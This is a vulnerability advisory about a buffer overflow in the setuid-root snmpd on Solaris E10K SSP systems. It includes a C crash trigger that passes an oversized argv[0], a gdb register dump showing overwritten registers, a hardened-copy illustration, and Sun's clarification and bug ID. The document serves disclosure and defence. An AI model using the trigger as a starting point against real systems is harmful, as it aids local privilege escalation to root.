COMMAND

    snmpd

SYSTEMS AFFECTED

    Solaris 8

PROBLEM

    Pablo Sor found the following.  The /opt/SUNWssp/snmpd command (SNMP
    proxy agent) is setuid root and contains a buffer overflow: it copies
    its own name (argv[0]) into an internal variable without checking the
    length of that name, and an over-long argv[0] therefore overflows the
    variable.  The demo program below starts snmpd with an argv[0] of a
    chosen length filled with 'A' (0x41) and the gdb session that follows
    shows the resulting crash in strcpy().

        #include <stdio.h>
        #include <stdlib.h>     /* malloc, atoi */
        #include <string.h>     /* memset */
        #include <unistd.h>     /* execl */

        /* Start snmpd with an argv[0] of the requested length filled
           with 'A' (0x41); the unchecked copy of its own name overflows. */
        int main(int argc, char **argv)
        {
        char *buf;
        int len = (argc > 1) ? atoi(argv[1]) : 0;
        if (len < 1) return 1;              /* usage: ./snmpd-demo 700 */
        buf = (char *) malloc(len * sizeof(char));
        memset(buf, 0x41, len - 1);
        buf[len - 1] = 0;
        execl("/opt/SUNWssp/bin/snmpd", buf, (char *)0);
        perror("execl");                    /* only reached if exec fails */
        return 1;
        }

        -----------------------------------------------------

        $ uname -a
        SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

        $ ./snmpd-demo 700
        Segmentation Fault (core dumped)

        $ gdb ./snmpd-demo --core=core

        [..]

        Program received signal SIGSEGV, Segmentation fault.
        0xfee32b58 in strcpy () from /usr/lib/libc.so.1
        (gdb) info registers
        g0             0x0      0
        g1             0x78000  491520
        g2             0xff22579c       -14526564
        g3             0xff162d78       -15323784
        g4             0x0      0
        g5             0x0      0
        g6             0x0      0
        g7             0x76f98  487320
        o0             0x2c1    705
        o1             0xffbed9b9       -4269639
        o2             0x2c1    705
        o3             0x41     65
        o4             0xffbed180       -4271744
        o5             0xff26a147       -14245561
        sp             0xffbed658       -4270504
        o7             0xfee83650       -18336176
        l0             0x7efefeff       2130640639
        l1             0x81010100       -2130640640
        l2             0xff000000       -16777216
        l3             0xff0000 16711680
        l4             0xff00   65280
        l5             0x0      0
        l6             0x0      0
        l7             0x0      0
        i0             0x41414141       1094795585   ;;;;;
        i1             0xffbed6fc       -4270340     ; pointer to argv[0]
        i2             0x41414141       1094795585   ;;;;;
        i3             0x41414141       1094795585   ;;;;;
        i4             0x81010100       -2130640640
        i5             0xff00   65280
        fp             0xffbed698       -4270440
        i7             0xff265474       -14265228
        y              0x6      6
        psr            0xfe001000       -33550336
        wim            0x0      0
        tbr            0x0      0
        pc             0xfee32b58       -18666664
        npc            0xfee32b5c       -18666660
        fpsr           0x0      0
        cpsr           0x0      0

        (gdb) x/20x $i1
        0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141
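    The unchecked copy of argv[0] that the advisory describes, shown beside
    a bounded version, as an added C illustration that is not the advisory's
    or Sun's code: the buffer size NAME_BUF, the agent_state layout and the
    try_name_of_length helper are assumptions, since snmpd's real internals
    are not given here.  The helper replays the demo's 700-byte 'A' name
    against the checked setter, which rejects it instead of overrunning.

```c
#include <stdio.h>
#include <string.h>

/* Size of the internal name buffer is an assumption: snmpd's real size is
 * unknown, so pick one that a 700-byte argv[0] clearly overruns. */
#define NAME_BUF 256

struct agent_state {
    char name[NAME_BUF];   /* copy of argv[0], as the advisory describes */
    int  port;             /* placed after the buffer: an overrun clobbers it */
};

/* The pattern the advisory describes: argv[0] copied into a fixed buffer
 * with no length check. Shown for contrast only and never called here,
 * since calling it with a long name is undefined behaviour. */
void set_name_unchecked(struct agent_state *st, const char *argv0)
{
    strcpy(st->name, argv0);
}

/* Hardened form: measure argv[0] against the buffer before copying and
 * reject anything that does not fit with its terminator. Returns 0 on
 * success, -1 on a missing or over-long name; the buffer is untouched
 * on failure. */
int set_name_checked(struct agent_state *st, const char *argv0)
{
    size_t n = 0;
    if (argv0 == NULL)
        return -1;
    while (n < NAME_BUF && argv0[n] != '\0')
        n++;
    if (n == NAME_BUF)          /* no NUL within the buffer's capacity */
        return -1;
    memcpy(st->name, argv0, n + 1);
    return 0;
}

/* Replays the demo's trigger: an argv[0] of the given length filled with
 * 'A' (0x41), constructed here. Returns the checked setter's result. */
int try_name_of_length(size_t len)
{
    char name[1024];
    struct agent_state st = { "", 161 };
    if (len >= sizeof name)
        return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    return set_name_checked(&st, name);
}
```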

SOLUTION

    Just for clarification, this binary is NOT part of Solaris 8; it is
    part of the SUNWsspop package, which is only installed on the SSP
    (System Service Processor) machine of an Enterprise 10000 (aka
    Starfire) system.

    This package is not part of a standard install.  It would only be
    loaded on the SSP of an E10K which, if recommended practice is
    followed, sits on a controlled admin network and only allows access
    to the users ssp and root, and perhaps to application IDs such as
    patrol.  The reason it is setuid is that it is normally started by
    the user ssp and needs to access privileged ports.

    Sun logged a bug (Id: 4425460), so the problem will be fixed in
    future releases.